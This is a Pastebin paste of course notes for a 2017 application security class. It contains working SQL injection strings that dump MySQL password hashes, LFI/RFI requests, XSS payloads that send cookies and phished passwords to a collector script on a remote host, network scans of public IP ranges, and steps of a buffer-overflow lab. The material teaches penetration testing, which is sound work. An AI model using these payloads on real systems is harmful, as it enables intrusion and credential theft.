Advertisement
joemccray

Norway AppSec 2017

Sep 25th, 2017
1,748
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #######################
  2. # Norway AppSec Class #
  3. #######################
  4.  
  5.  
  6.  
  7. #################
  8. # Passive Recon #
  9. #################
  10.  
  11. - Wikipedia Page
  12. - Are they Public or Private?
  13. - Does the target have any subsidiaries?
  14.  
  15. - Robtex
  16. - Show system map
  17.  
  18. - Netcraft
  19. - http://toolbar.netcraft.com/site_report
  20.  
  21. - Passive Recon (Firefox Add-on)
  22.  
  23. - Example OSINT Report to review:
  24. https://s3.amazonaws.com/infosecaddictsfiles/OSINT_Innophos_11242010.doc
  25.  
  26.  
  27.  
  28.  
  29. ##################################
  30. # Basic: Web Application Testing #
  31. ##################################
  32.  
  33. Most people are going to tell you reference the OWASP Testing guide.
  34. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  35.  
  36. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  37.  
  38.  
  39. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  40.  
  41. 1. Does the website talk to a DB?
  42. - Look for parameter passing (ex: site.com/page.php?id=4)
  43. - If yes - try SQL Injection
  44.  
  45. 2. Can I or someone else see what I type?
  46. - If yes - try XSS
  47.  
  48. 3. Does the page reference a file?
  49. - If yes - try LFI/RFI
  50.  
  51. Let's start with some manual testing against 45.63.104.73
  52.  
  53.  
  54. #######################
  55. # Attacking PHP/MySQL #
  56. #######################
  57.  
  58. Go to LAMP Target homepage
  59. http://45.63.104.73/
  60.  
  61.  
  62.  
  63. Clicking on the Acer Link:
  64. http://45.63.104.73/acre2.php?lap=acer
  65.  
  66. - Found parameter passing (answer yes to question 1)
  67. - Insert ' to test for SQLI
  68.  
  69. http://45.63.104.73/acre2.php?lap=acer'
  70.  
  71.  
  72. Page returns the following error:
  73. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
  74.  
  75.  
  76.  
  77. In order to perform union-based sql injection - we must first determine the number of columns in this query.
  78. We do this using the ORDER BY
  79. http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
  80.  
  81. Page returns the following error:
  82. Unknown column '100' in 'order clause'
  83.  
  84.  
  85.  
  86. http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
  87.  
  88. Page returns the following error:
  89. Unknown column '50' in 'order clause'
  90.  
  91.  
  92.  
  93. http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
  94. Page returns the following error:
  95. Unknown column '25' in 'order clause'
  96.  
  97.  
  98.  
  99. http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
  100.  
  101. Page returns the following error:
  102. Unknown column '50' in 'order clause'
  103.  
  104.  
  105.  
  106. http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
  107. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  108.  
  109.  
  110.  
  111. Now we build out the union all select statement with the correct number of columns
  112.  
  113. Reference:
  114. http://www.techonthenet.com/sql/union.php
  115.  
  116.  
  117.  
  118. http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  119.  
  120.  
  121.  
  122. Now we negate the parameter value 'acer' by turning into the word 'null':
  123. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  124.  
  125. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  126.  
  127.  
  128. Use a cheat sheet for syntax:
  129. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  130.  
  131.  
  132. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  133.  
  134. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  135.  
  136. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
  137.  
  138. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
  139.  
  140.  
  141. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
  142.  
  143.  
  144.  
  145. ########################
  146. # Question I get a lot #
  147. ########################
  148. Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
  149.  
  150. Here is a good reference for it:
  151. https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
  152.  
  153. Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
  154.  
  155.  
  156.  
  157.  
  158. #########################
  159. # File Handling Attacks #
  160. #########################
  161.  
  162. Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
  163. http://45.63.104.73/showfile.php?filename=about.txt
  164.  
  165.  
  166.  
  167. See if you can read files on the file system:
  168. http://45.63.104.73/showfile.php?filename=/etc/passwd
  169.  
  170. We call this attack a Local File Include or LFI.
  171.  
  172. Now let's find some text out on the internet somewhere:
  173. https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
  174.  
  175.  
  176. Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
  177. http://45.63.104.73/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
  178.  
  179.  
  180.  
  181. ###############################################################################
  182. # What is XSS #
  183. # https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
  184. ###############################################################################
  185.  
  186. OK - what is Cross Site Scripting (XSS)
  187.  
  188. 1. Use Firefox to browse to the following location:
  189.  
  190. http://45.63.104.73/xss_practice/
  191.  
  192. A really simple search page that is vulnerable should come up.
  193.  
  194.  
  195.  
  196.  
  197. 2. In the search box type:
  198.  
  199. <script>alert('So this is XSS')</script>
  200.  
  201.  
  202. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  203. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  204.  
  205.  
  206. 3. In the search box type:
  207.  
  208. <script>alert(document.cookie)</script>
  209.  
  210.  
  211. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  212. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  213.  
  214. 4. Now replace that alert script with:
  215.  
  216. <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  217.  
  218.  
  219. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  220.  
  221.  
  222. 5. Now view the stolen cookie at:
  223. http://45.63.104.73/xss_practice/cookie_stealer_logs.html
  224.  
  225.  
  226. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  227.  
  228.  
  229.  
  230.  
  231.  
  232.  
  233. ############################
  234. # A Better Way To Demo XSS #
  235. ############################
  236.  
  237.  
  238. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  239.  
  240.  
  241. Use Firefox to browse to the following location:
  242.  
  243. http://45.63.104.73/xss_practice/
  244.  
  245.  
  246.  
  247. Paste this in the search box
  248. ----------------------------
  249.  
  250.  
  251.  
  252. <script>
  253. password=prompt('Your session is expired. Please enter your password to continue',' ');
  254. document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
  255. </script>
  256.  
  257.  
  258. Now view the stolen cookie at:
  259. http://45.63.104.73/xss_practice/passwords.html
  260.  
  261.  
  262.  
  263.  
  264.  
  265.  
  266.  
  267.  
  268. #########################
  269. # Setting up Burp Suite #
  270. #########################
  271. Download the latest free version of FoxyProxy at https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  272.  
  273. Download the latest free version of Burp at https://portswigger.net/burp/freedownload
  274.  
  275. Be sure to download the appropriate version for your computer system/OS.
  276.  
  277. Make sure that burpsuite_free_v1.7.27.jar is set as executable (chmod +x burpsuite_free_v1.7.27.jar) and then run:
  278.  
  279. java -jar burpsuite_free_v1.7.27.jar
  280.  
  281. - Click the "Proxy" tab
  282. - Click the "Options" sub tab
  283. - Click “Edit” in the “Proxy Listeners” section
  284. - In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only”
  285. - In the same pop up make sure that the bind port is 8080
  286. - In the same pop up select the “Certificate” tab
  287. - Ensure that burp is configured to "generate CA-signed per-host certificates"
  288.  
  289. Open Firefox
  290. - Click "Edit"
  291. - Click “Preferences"
  292. - Click the "Advanced" tab
  293. - Click the "Network" sub tab
  294. - Click the connection "settings" button
  295. - Click "manual proxy configuration"
  296. set it to 127.0.0.1 port 8080
  297. check "Use this proxy server for all protocols"
  298. - Remove both the "localhost, 127.0.0.1" text from the "No Proxy For:" line
  299.  
  300.  
  301. Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.
  302.  
  303. Visit any SSL-protected URL.
  304.  
  305. On the “This Connection is Untrusted” screen, click on “Add Exception”
  306. Click "Get Certificate", then click "View".
  307.  
  308. In the “Details” tab, select the root certificate in the tree (PortSwigger CA).
  309.  
  310. Click "Export" and save the certificate as "BurpCert" on the Desktop.
  311.  
  312. Close Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog
  313. Go to Edit | Preferences
  314. Click “Advanced” and go to “Certificates” tab
  315. Click “View Certificates”
  316.  
  317. Click "Import" and select the certificate file that you previously saved.
  318.  
  319. On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".
  320.  
  321. Close all dialogs and restart Firefox
  322.  
  323.  
  324.  
  325.  
  326.  
  327. ###############################################################
  328. # Question 1: What is the process that you use when you test? #
  329. ###############################################################
  330.  
  331. Step 1: Automated Testing
  332.  
  333. Step 1a: Web Application vulnerability scanners
  334. -----------------------------------------------
  335. - Run two (2) unauthenticated vulnerability scans against the target
  336. - Run two (2) authenticated vulnerability scans against the target with low-level user credentials
  337. - Run two (2) authenticated vulnerability scans against the target with admin privileges
  338.  
  339. The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
  340.  
  341. A good web application vulnerability scanner comparison website is here:
  342. http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
  343.  
  344.  
  345. Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  346.  
  347. When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  348.  
  349.  
  350. Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
  351.  
  352.  
  353. Also, be sure to save the scan results and logs. I usually provide this data to the customer.
  354.  
  355.  
  356.  
  357. Step 1b: Directory Brute Forcer
  358. -------------------------------
  359. I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
  360.  
  361.  
  362.  
  363. Step 2: Manual Testing
  364.  
  365. Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
  366.  
  367. Step 2a: Spider/Scan the entire site with Burp Suite
  368. Save the spider and scan results. I usually provide this data to the customer as well.
  369.  
  370.  
  371. Step 2b: Browse through the site using the 3 question method
  372. Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
  373.  
  374. Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
  375.  
  376. Here is what I mean:
  377. http://www.site.com/page.aspx?parametername=parametervalue
  378.  
  379. When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
  380.  
  381. http://www.site.com/page.aspx?parametername=[ payload ]
  382.  
  383. You need to ensure that you send the payload this way, and like this below:
  384.  
  385. http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
  386.  
  387. This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
  388.  
  389.  
  390.  
  391.  
  392.  
  393.  
  394.  
  395. ###########################################
  396. # Question 2: How much fuzzing is enough? #
  397. ###########################################
  398. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  399.  
  400. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  401.  
  402.  
  403. Step 1: Ask yourself the 3 questions per page of the site.
  404.  
  405. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  406.  
  407. Step 3: When you load your fuzz strings - use the following decision tree
  408.  
  409. - Are the fuzz strings causing a default error message (example 404)?
  410. - If this is the case then it is most likely NOT vulnerable
  411.  
  412. - Are the fuzz strings causing a WAF or LB custom error message?
  413. - If this is the case then you need to find an encoding method to bypass
  414.  
  415.  
  416. - Are the fuzz strings causing an error message that discloses the backend type?
  417. - If yes, then identify DB type and find correct syntax to successfully exploit
  418. - Some example strings that I use are:
  419. '
  420. "
  421. () <----- Take the parameter value and put it in parenthesis
  422. (5-1) <----- See if you can perform an arithmetic function
  423.  
  424.  
  425. - Are the fuzz strings rendering executable code?
  426. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  427. - Some example strings that I use are:
  428. <b>hello</b>
  429. <u>hello</u>
  430. <script>alert(123);</script>
  431. <script>alert(xss);</script>
  432. <script>alert('xss');</script>
  433. <script>alert("xss");</script>
  434.  
  435.  
  436.  
  437.  
  438.  
  439.  
  440.  
  441. -------------------------------------------------------------------------------------------
  442. OWASP Top 10 Video Explanations
  443.  
  444. Burp Suite Reference:
  445. https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten
  446.  
  447. A1: Injection Vulnerabilities
  448. https://www.youtube.com/watch?v=9CnpHT5Nn8c&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
  449.  
  450.  
  451. A2: Broken Authentication and Session Management
  452. https://www.youtube.com/watch?v=R1iGRBG3PJ8&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=2
  453.  
  454. A3: Cross Site Scripting (XSS)
  455. https://www.youtube.com/watch?v=90XT0j5E7xo&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=4
  456.  
  457. A4: Insecure Direct Object Reference
  458. https://www.youtube.com/watch?v=bMYpGj2xzpM&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=5
  459.  
  460.  
  461. A5: Security Misconfiguration
  462. https://www.youtube.com/watch?v=ouuXu9_UM0w&index=7&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
  463.  
  464.  
  465. A6: Sensitive Data Exposure
  466. https://www.youtube.com/watch?v=x-B8I420x7Y&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=8
  467.  
  468.  
  469. A7: Missing Function Level Access Control and A8 Cross-Site Request Forgery (CSRF)
  470. https://www.youtube.com/watch?v=gf6cb7MnP-c&index=9&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
  471.  
  472. A9 Using Components w/ Known Vulnerabilities & A10 Unvalidated Redirects and Forwards
  473. https://www.youtube.com/watch?v=WqlSl-Pc1vk&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=10
  474.  
  475.  
  476.  
  477.  
  478.  
  479. ************************ Class Homework ************************
  480.  
  481. In order to collaborate with the other students on your homework you must signup with your Gmail account using the following Google form:
  482. https://goo.gl/forms/Ou5yi0VhbLJZBufg2
  483.  
  484. Filling out this form will give you access to the Google Drive folder where the class homework is contained.
  485.  
  486.  
  487. Day 1 Homework:
  488. ---------------
  489. Here is a good reference for how to install and configure Burp Suite:
  490. https://nvisium.com/blog/2014/01/10/setting-up-burpsuite-with-firefox-and/
  491.  
  492.  
  493. Create a step by step walk-through that details how to install and configure burp suite in Windows, and in Linux.
  494. Team 1: Windows
  495. Team 2: Linux
  496.  
  497.  
  498.  
  499.  
  500. Day 2 Homework:
  501. ---------------
  502. Here is a good reference of how to use Burp to look for OWASP Top 10 vulnerabilities:
  503. https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten
  504.  
  505.  
  506. Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:
  507. Team 1: http://45.63.104.73/
  508. Team 2: http://54.245.184.121/
  509.  
  510.  
  511.  
  512. ---------------------------------------------------------------------------------------------------------
  513.  
  514.  
  515.  
  516.  
  517.  
  518.  
  519.  
  520. #########
  521. # Day 3 #
  522. #########
  523.  
  524. yum -y update
  525.  
  526. yum -y groupinstall 'Development Tools'
  527.  
  528. yum -y install nmap bind-utils vim
  529.  
  530.  
  531. cd ~
  532.  
  533. mkdir toolz
  534.  
  535. cd ~/toolz
  536.  
  537. wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
  538.  
  539. gcc ipcrawl.c -o ipcrawl
  540.  
  541. chmod 777 ipcrawl
  542.  
  543. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  544.  
  545. gcc propecia.c -o propecia
  546.  
  547. chmod 777 propecia
  548.  
  549. cp propecia /bin
  550.  
  551. cd ~/toolz/
  552.  
  553. ./ipcrawl 148.87.1.1 148.87.1.254
  554.  
  555. nmap -sL 148.87.1.0-255
  556.  
  557. nmap -sL 148.87.1.0-255 | grep oracle
  558.  
  559. dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
  560.  
  561.  
  562.  
  563. #################################################
  564. # Screenshotting the Web Servers in the Network #
  565. #################################################
  566. cd ~/toolz/
  567. mkdir labscreenshots
  568. cd labscreenshots/
  569.  
  570.  
  571. wget https://s3.amazonaws.com/infosecaddictsfiles/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  572. tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  573. cd wkhtmltox/bin/
  574. cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386
  575.  
  576.  
  577. cd ~/toolz/
  578. git clone git://github.com/SpiderLabs/Nmap-Tools.git
  579. cd Nmap-Tools/NSE/
  580.  
  581. cp http-screenshot.nse /usr/share/nmap/scripts/
  582.  
  583.  
  584. nmap --script-updatedb
  585.  
  586. cd ~/toolz/
  587. propecia 10.250.100 80 >> temp
  588. strings temp >> labnet-ip-list.txt
  589.  
  590. cd ~/toolz/labscreenshots/
  591. nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.250.100.0/24 -iL /root/toolz/labnet-ip-list.txt
  592.  
  593.  
  594.  
  595.  
  596. -----------------------------------------
  597. vi screenshots.sh
  598.  
  599. #!/bin/bash
  600. printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
  601. ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
  602. printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
  603. -----------------------------------------
  604.  
  605.  
  606.  
  607.  
  608. sh screenshots.sh
  609.  
  610.  
  611.  
  612. python -m SimpleHTTPServer
  613.  
  614.  
  615. --- Now browse to the IP of your Linux machine on port 8000 (http://10.250.100.157:8000/labnet-port-80-screenshots.html):
  616. http://CentOS-VM-IP:8000/labnet-port-80-screenshots.html
  617.  
  618.  
  619. ##########################
  620. # Nmap NSE tricks to try #
  621. ##########################
  622. nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.250.100.0/24
  623.  
  624. /sbin/iptables -F
  625. nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.250.100.0/24
  626.  
  627.  
  628. nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.250.100.0/24
  629.  
  630.  
  631. nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.250.100.0/24
  632.  
  633.  
  634.  
  635. nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.250.100.0/24
  636.  
  637.  
  638. nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.250.100.0/24
  639.  
  640.  
  641.  
  642.  
  643.  
  644. #####################################
  645. # Writing Your Own Nmap NSE Scripts #
  646. #####################################
  647.  
  648.  
  649. ----------------------------------------------------------------------
  650. vi /usr/share/nmap/scripts/intro-nse.nse
  651.  
  652. -- The Head Section --
  653. -- The Rule Section --
  654. portrule = function(host, port)
  655. return port.protocol == "tcp"
  656. and port.number == 80
  657. and port.state == "open"
  658. end
  659.  
  660. -- The Action Section --
  661. action = function(host, port)
  662. return "Norway rocks!"
  663. end
  664. ----------------------------------------------------------------------
  665.  
  666. - Ok, now that we've made that change let's run the script
  667. nmap --script=/usr/share/nmap/scripts/intro-nse.nse .com -p 22,80,443
  668.  
  669.  
  670.  
  671.  
  672.  
  673.  
  674. ----------------------------------------------------------------------
  675. vi /usr/share/nmap/scripts/intro-nse.nse
  676.  
  677. -- The Head Section --
  678. local shortport = require "shortport"
  679.  
  680. -- The Rule Section --
  681. portrule = shortport.http
  682.  
  683.  
  684. -- The Action Section --
  685. action = function(host, port)
  686. return "Norway rocks!"
  687. end
  688. ----------------------------------------------------------------------
  689.  
  690. - Ok, now that we've made that change let's run the script
  691. nmap --script=/usr/share/nmap/scripts/intro-nse.nse .com -p 22,80,443
  692.  
  693.  
  694.  
  695.  
  696.  
  697.  
  698.  
  699. OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
  700.  
  701. ----------------------------------------------------------------------
  702. vi /usr/share/nmap/scripts/intro-nse.nse
  703.  
  704. -- The Head Section --
  705. local shortport = require "shortport"
  706. local http = require "http"
  707.  
  708. -- The Rule Section --
  709. portrule = shortport.http
  710.  
  711. -- The Action Section --
  712. action = function(host, port)
  713.  
  714. local uri = "/installing-metasploit-in-ubunt/"
  715. local response = http.get(host, port, uri)
  716. return response.status
  717.  
  718. end
  719. ----------------------------------------------------------------------
  720.  
  721. - Ok, now that we've made that change let's run the script
  722. nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  723.  
  724.  
  725.  
  726.  
  727. ----------------------------------------------------------------------
  728. vi /usr/share/nmap/scripts/intro-nse.nse
  729.  
  730. -- The Head Section --
  731. local shortport = require "shortport"
  732. local http = require "http"
  733.  
  734. -- The Rule Section --
  735. portrule = shortport.http
  736.  
  737. -- The Action Section --
  738. action = function(host, port)
  739.  
  740. local uri = "/installing-metasploit-in-ubunt/"
  741. local response = http.get(host, port, uri)
  742.  
  743. if ( response.status == 200 ) then
  744. return response.body
  745. end
  746.  
  747. end
  748. ----------------------------------------------------------------------
  749.  
  750. - Ok, now that we've made that change let's run the script
  751. nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  752.  
  753.  
  754.  
  755.  
  756.  
  757.  
  758.  
  759.  
  760.  
  761. ----------------------------------------------------------------------
  762. vi /usr/share/nmap/scripts/intro-nse.nse
  763.  
  764. -- The Head Section --
  765. local shortport = require "shortport"
  766. local http = require "http"
  767. local string = require "string"
  768.  
  769. -- The Rule Section --
  770. portrule = shortport.http
  771.  
  772. -- The Action Section --
  773. action = function(host, port)
  774.  
  775. local uri = "/installing-metasploit-in-ubunt/"
  776. local response = http.get(host, port, uri)
  777.  
  778. if ( response.status == 200 ) then
  779. local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  780. return title
  781. end
  782.  
  783. end
  784. ----------------------------------------------------------------------
  785.  
  786. - Ok, now that we've made that change let's run the script
  787. nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  788.  
  789.  
  790.  
  791.  
  792.  
  793.  
  794.  
  795. ----------------------------------------------------------------------
  796. vi /usr/share/nmap/scripts/intro-nse.nse
  797.  
  798. -- The Head Section --
  799. local shortport = require "shortport"
  800. local http = require "http"
  801. local string = require "string"
  802.  
  803. -- The Rule Section --
  804. portrule = shortport.http
  805.  
  806. -- The Action Section --
  807. action = function(host, port)
  808.  
  809. local uri = "/installing-metasploit-in-ubunt/"
  810. local response = http.get(host, port, uri)
  811.  
  812. if ( response.status == 200 ) then
  813. local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  814.  
  815. if (title) then
  816. return "Vulnerable"
  817. else
  818. return "Not Vulnerable"
  819. end
  820. end
  821. end
  822.  
  823. ----------------------------------------------------------------------
  824.  
  825. - Ok, now that we've made that change let's run the script
  826. nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  827.  
  828.  
  829. ########################
  830. # Scanning Methodology #
  831. ########################
  832.  
  833. - Ping Sweep
  834. What's alive?
  835. ------------
  836. sudo nmap -sP 157.166.226.*
  837.  
  838.  
  839. -if -SP yields no results try:
  840. sudo nmap -sL 157.166.226.*
  841.  
  842. -Look for hostnames:
  843. sudo nmap -sL 157.166.226.* | grep com
  844.  
  845.  
  846. - Port Scan
  847. What's where?
  848. ------------
  849. sudo nmap -sS 162.243.126.247
  850.  
  851.  
  852.  
  853. - Bannergrab/Version Query
  854. What versions of software are running
  855. -------------------------------------
  856. sudo nmap -sV 162.243.126.247
  857.  
  858.  
  859.  
  860. - Vulnerability Research
  861. Lookup the banner versions for public exploits
  862. ----------------------------------------------
  863. http://exploit-db.com
  864. http://securityfocus.com/bid
  865. https://packetstormsecurity.com/files/tags/exploit/
  866.  
  867.  
  868. #####################################
  869. # Quick Stack Based Buffer Overflow #
  870. #####################################
  871.  
  872. - You can download everything you need for this exercise (except netcat) from the link below
  873. https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  874.  
  875. https://s3.amazonaws.com/infosecaddictsfiles/nc-password-is-netcat.zip
  876. - The password for the file is 'netcat'
  877.  
  878. - Extract this zip file to your Desktop
  879.  
  880. Open a command prompt
  881. =====================
  882.  
  883. Browse to the folder C:\Users\Student\Desktop\ExploitLab\1-Software-To-Install and install both Python and Nmap
  884.  
  885.  
  886.  
  887.  
  888. - Go to folder C:\Users\Student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  889.  
  890. - Open a new command prompt and type:
  891. ncat localhost 9999
  892.  
  893. - In the new command prompt window where you ran ncat type:
  894. HELP
  895.  
  896. - Go to folder C:\Users\Student\Desktop\ExploitLab\4-AttackScripts
  897. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  898.  
  899.  
  900.  
  901. cd c:\Python27>
  902.  
  903. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\1-simplefuzzer.py
  904. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  905.  
  906.  
  907. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  908.  
  909. - Now go to folder C:\Users\Student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  910.  
  911. - Go back to folder C:\Users\Student\Desktop\ExploitLab\4-AttackScripts and run 1-simplefuzzer.py.
  912.  
  913. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  914.  
  915.  
  916.  
  917.  
  918.  
  919. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  920.  
  921. cd c:\Python27>
  922.  
  923. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\2-3000chars.py
  924.  
  925.  
  926.  
  927.  
  928.  
  929. - Calculate the distance to EIP by running script 3-3000chars.py
  930. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  931.  
  932. cd c:\Python27>
  933.  
  934. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\3-3000chars.py
  935.  
  936.  
  937.  
  938.  
  939.  
  940. 4-count-chars-to-EIP.py
  941. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  942. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  943.  
  944. cd c:\Python27>
  945.  
  946. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\4-count-chars-to-EIP.py
  947.  
  948.  
  949.  
  950. 5-2006char-eip-check.py
  951. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  952.  
  953. cd c:\Python27>
  954.  
  955. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\5-2006char-eip-check.py
  956.  
  957.  
  958.  
  959. 6-jmp-esp.py
  960. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  961.  
  962. cd c:\Python27>
  963.  
  964. c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\6-jmp-esp.py
